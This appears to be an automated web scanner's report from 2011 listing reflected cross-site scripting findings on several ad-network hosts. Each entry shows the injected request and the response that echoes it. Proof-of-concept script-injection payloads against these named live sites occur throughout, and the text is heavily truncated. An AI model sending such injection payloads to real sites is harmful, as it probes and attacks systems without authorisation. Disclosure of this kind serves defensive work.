HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:36:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:36:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sitesbb72e"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilte ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen |
GET /sites/allbc129"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:07 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:07 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites/allbc129"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen |
GET /sites/allab5d0"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:04 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen |
GET /sites/all/themesed59a"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:55 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites/all s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen |
GET /sites/all/themescde6f"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen/zen |
GET /sitesd6638"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:39:01 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:39:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13588 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen/zen |
GET /sites5abd4"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:39:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:39:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13518 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites5abd4"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen/zen |
GET /sitese6275"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:05 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:05 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13482 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sitese6275"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen/zen |
GET /sites153e5"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:55 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13552 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /naie956f"><script>alert(1)< Host: nai.tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E6EB92B6E651A4 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13800 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.tacoda ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /nai5505b"-alert(1)- Host: nai.tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E6EB92B6E651A4 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai5505b"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /nai/daa.phpc95a4"-alert(1)- Host: nai.tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E6EB92B6E651A4 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:48 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.phpc95a4"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /nai/daa.php92e80"><script>alert(1)< Host: nai.tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E6EB92B6E651A4 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:45 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13800 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.tacoda ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=144735ee"-alert(1)- Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A53D4BC0A Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:23:46 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://tag.admeld.com/ad adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=144735ee"-alert(1)- debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt764nwm" }; (function(){var O="3.13.1";var w=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=144&pubId Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=FD7121AF5 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:23:47 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://tag.admeld.com/ad adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=144&pubId=24537 debug : "false", allowPhoneHome : "true", phoneHomeDelay : "3000", killPhrases : "", asid : "gt764oox" }; (function(){var O="3.13.1";var w=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=144&pubId Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=120EBAC52 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:23:48 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://tag.admeld.com/ad adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=144&pubId=24537 debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt764p6n" }; (function(){var O="3.13.1";var w=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=144&pubId Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7104C1DD4 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:23:47 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://tag.admeld.com/ad adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=144&pubId=24537bd807"-alert(1)- debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt764o9q" }; (function(){var O="3.13.1";var w=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.skimresources |
Path: | /api/ |
GET /api/?callback=skiml Host: r.skimresources.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Sat, 17 Sep 2011 16:39:10 GMT P3P: policyref="http:/ Server: Apache Vary: Accept-Encoding X-Powered-By: PHP/5.3.6 X-SKIM-Hostname: api03.angel.skimlinks.com Content-Length: 172 Connection: keep-alive skimlinksApplyHandlers164ae<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://sb1.analogana |
Path: | /publishers/hearst |
GET /publishers/hearst Host: sb1.analoganalytics.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sat, 17 Sep 2011 16:24:55 GMT Content-Type: application/javascript Connection: keep-alive Status: 200 OK ETag: "b4920233f20df6d93df X-Runtime: 67 Content-Length: 686 Cache-Control: max-age=600, public ANALOG._retrieveDail ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://servedby |
Path: | /imp/3/17799 |
GET /imp/3/17799;189583;201 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: flashtalkingad1="GUID |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 17 Sep 2011 16:52:35 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR Connection: keep-alive Content-Length: 564 var ftGUID_189583="13553 var ftConfID_189583= var ftParams_189583="click var ftKeyword_189583=""; var ftSegment_189583=""; var ftSegmentList_189583=[]; var ftRuleMatch_189583="0"; document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://servedby |
Path: | /imp/3/17799 |
GET /imp/3/17799;189583;201 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: flashtalkingad1="GUID |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:53:37 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 564 content-type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" pragma: no-cache Via: 1.1 mdw061005 (MII-APC/2.1) var ftGUID_189583="13553 var ftConfID_189583= var ftParams_189583="click var ftKeyword_189583=""; var ftSegment_189583=""; var ftSegmentList_189583=[]; var ftRuleMatch_189583="0"; document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://servedby |
Path: | /imp/3/17799 |
GET /imp/3/17799;189583;201 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: flashtalkingad1="GUID |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:53:14 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store pragma: no-cache Content-Type: text/javascript Content-Length: 564 P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061001 (MII-APC/2.1) var ftGUID_189583="13553 var ftConfID_189583= var ftParams_189583="click var ftKeyword_189583=""; var ftSegment_189583=""; var ftSegmentList_189583=[]; var ftRuleMatch_189583="0"; document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://servedby |
Path: | /imp/3/17799 |
GET /imp/3/17799;189583;201 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: flashtalkingad1="GUID |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:53:25 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 564 content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061003 (MII-APC/2.1) var ftGUID_189583="13553 var ftConfID_189583= var ftParams_189583="click var ftKeyword_189583=""; var ftSegment_189583=""; var ftSegmentList_189583=[]; var ftRuleMatch_189583="0"; document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://servedby |
Path: | /imp/3/17799 |
GET /imp/3/17799;189583;201 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: flashtalkingad1="GUID |
